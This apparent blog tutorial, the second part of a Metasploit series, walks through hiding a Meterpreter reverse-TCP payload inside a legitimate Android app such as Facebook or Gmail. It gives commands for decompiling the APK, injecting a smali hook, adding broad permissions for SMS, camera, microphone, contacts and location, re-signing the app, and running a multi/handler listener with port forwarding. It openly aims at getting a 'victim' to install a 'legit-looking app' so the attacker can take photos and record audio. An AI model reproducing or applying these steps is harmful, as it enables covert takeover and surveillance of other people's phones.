Hacking Android With Metasploit!

We’ve discussed how to create Metasploit payload and how to configure your Linux to NOIP account for DDNS in First Part of this series

In this second and the last part we’ll do Hooking up the metasploit node and embedding the payload inside the Android App. (Your favored apps like Facebook or Gmail or any games)

For that we require:

  • APKTOOL the android reverse engineering tool

You can install the apktool easily by typing this command on terminals (Apktool is came with the Kali-Linux OS)

sudo apt-get install apktool

  • Jarsigner for digitally sign the android Apps with fake certificates

Download necessary files for jarsigner from our GitHub repository
OneClicksigner

So now all we’ve to do is:

1. Generate the Meterpreter payload

2.Decompile the payload and the original apk

3.Copy the payload files to the original apk

4.Inject the hook into the appropriate activity of the original apk

5.Inject the permissions in the AndroidManifest.xml file

6.Re-compile the original apk

7.Sign the apk using Jarsigner

We’ve already done with generating Metasploit payload in last part.

So we’ll continue to

Second step

Decompiling the payload and you’re desired APK file which you want place your payload:


The apktool decompile command is as follows

apktool d -f -o payload /root/meterpreter.apk
apktool d -f -o original /root/original_app_name.apk

After compliment this process there will be 2 folders at the root one contains the files of msf payload and another one is of original apk which is to be binded by payload.

Third step

Coping the Files from Payload apk to original apk:

So open up the AndroidManifest.xml file located inside the “/root/original” folder using any text editor.

If you know HTML, then this file will look familiar to you. Both of them are essentially Markup Languages, and both use the familiar tags and attributes structure e.g. <tag attribute=”value”> Content </tag>. Anyway, look for an <activity> tag which contains both the lines –

<action android:name=”android.intent.action.MAIN”/>
<category android:name=”android.intent.category.LAUNCHER”/>

Step four

Inject the hook into the appropriate activity of the original apk

On a side note, you can use CTRL+F to search within the document in any GUI text editor. When you locate that activity, note its “android:name” attribute’s value

Those two lines we searched for signifies that this is the activity which is going to start when we launch the app from the launcher icon, and also this is a MAIN activity similar to the ‘main’ function in traditional programming.

Now that we have the name of the activity we want to inject the hook into, let’s get to it! First of all, open the .smali code of that activity using text editors. Just open a terminal and type –

gedit /root/original/smali/Activity_Path

Replace the Activity_Path with the activity’s “android:name“, but instead of the dots, type slash. Actually the smali codes are stored in folders named in the format the “android:name” is in, so we can easily get the location of the .smali code in the way we did.

Then search for the following line in the smali code using CTRL+F –

;->onCreate(Landroid/os/Bundle;)V

When you get that change the entire line to this

invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V

When the mainactivity executes this line what happens is the app executes the main activity of the app with the metasploit payload.

So we can get the meterpreter shell in our Console.

Step five

Inject the permissions in the AndroidManifest.xml file

Now we all are set but we must have to give necessary permissions or additional permission to get the full control over android device for that we’ve to edit the android manifest xml file
XML file looks as the HTML so it’s easy to manipulate the file.

Please copy this text and place it in specified area after <permission> tag with other but don’t make redundant lines:

<uses-permission android:name="android.permission.VIBRATE"/>
<uses-permission android:name="android.permission.CHANGE_NETWORK_STATE"/>
<uses-permission android:name="android.permission.WAKE_LOCK"/>
<uses-permission android:name="android.permission.READ_PHONE_STATE"/>
<uses-permission android:name="com.android.launcher.permission.INSTALL_SHORTCUT"/>
<uses-permission android:name="android.permission.CAMERA"/>
<uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
<uses-permission android:name="android.permission.PERSISTENT_ACTIVITY"/>
<uses-permission android:name="android.permission.MOUNT_UNMOUNT_FILESYSTEMS"/>
<uses-permission android:name="android.permission.READ_LOGS"/>
<uses-permission android:name="android.permission.DEVICE_POWER"/>
<uses-permission android:name="android.permission.SET_WALLPAPER"/>
<uses-permission android:name="android.permission.WRITE_SETTINGS"/>
<uses-permission android:name="android.permission.EXPAND_STATUS_BAR"/>
<uses-permission android:name="android.permission.GET_TASKS"/>
<uses-permission android:name="android.permission.DISABLE_KEYGUARD"/>
<uses-permission android:name="android.permission.STATUS_BAR"/>
<uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
<uses-permission android:name="com.android.launcher.permission.READ_SETTINGS"/>
<uses-permission android:name="android.permission.ACCESS_WIFI_STATE"/>
<uses-permission android:name="android.permission.CHANGE_WIFI_STATE"/>
<uses-permission android:name="android.permission.INTERNET"/>
<uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
<uses-permission android:name="android.permission.ACCESS_COURSE_LOCATION"/>
<uses-permission android:name="android.permission.SEND_SMS"/>
<uses-permission android:name="android.permission.RECEIVE_SMS"/>
<uses-permission android:name="android.permission.RECORD_AUDIO"/>
<uses-permission android:name="android.permission.CALL_PHONE"/>
<uses-permission android:name="android.permission.READ_CONTACTS"/>
<uses-permission android:name="android.permission.WRITE_CONTACTS"/>
<uses-permission android:name="android.permission.READ_SMS"/>
<uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
<uses-permission android:name="com.android.vending.BILLING"/>

Step six

Re-compile the original apk

After saving the XML file we’ve to go for re-compilation of file to get embedded with .apk file.

apktool b /root/original

Now the original apk file is ready!

Step seven

Sign the apk using Jarsigner

Android requires that all apps be digitally signed with a certificate before they can be installed. It (Android) uses this certificate to identify the author of an app, and the certificate does not need to be signed by a certificate authority. Android apps often use self-signed certificates. The app developer holds the certificate’s private key.

In this case we are going to sign the apk using the default android debug key. Just run the following command –

jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA apk_path androiddebugkey

The file keystore and all the necessary files there in the oncliksign.zip file please download this from the following links

Download Link1

Download Link2

Now if you can get the victim to install and run this very legit-looking app in his phone, you can get a working meterpreter session on his phone!

Just open your console command:

->msfconsole
->use multi/handler
->set PAYLOAD android/meterpreter/reverse_tcp
->set LHOST
->set LPORT 4444
->exploit

While specifying PAYLOAD Please check that what you’ve given while creating PAYLOAD
it should be same and to get the meterpreter session the port 4444 should be PORT FORWARDED from your router/modem.

To do this go to your gateway or home-page of router (Example: 192.168.1.1/home.html)

There you’ll find the Virtual Server or Port Forwarding option just set all TCP port forwarding active.

If you use internet from android mobile hotspots please Download Port Forward Apps avilable on Playstore.

Profit from this Tool is

When the victim installs the app in his phone you’ll get meterpreter session opened and you can perform many operations on it like taking photo,recording voice check_root etc…

Just type help when you get meterpreter session there are several operations will be listed!

I hope this Metasploit series of hacking android phones is very helpful. 🙂

If you have any queries please write in comments section we’ll take care of it.

Thank you..!

Lanwil DS (Team HR)

3 COMMENTS

LEAVE A REPLY

Please enter your comment!
Please enter your name here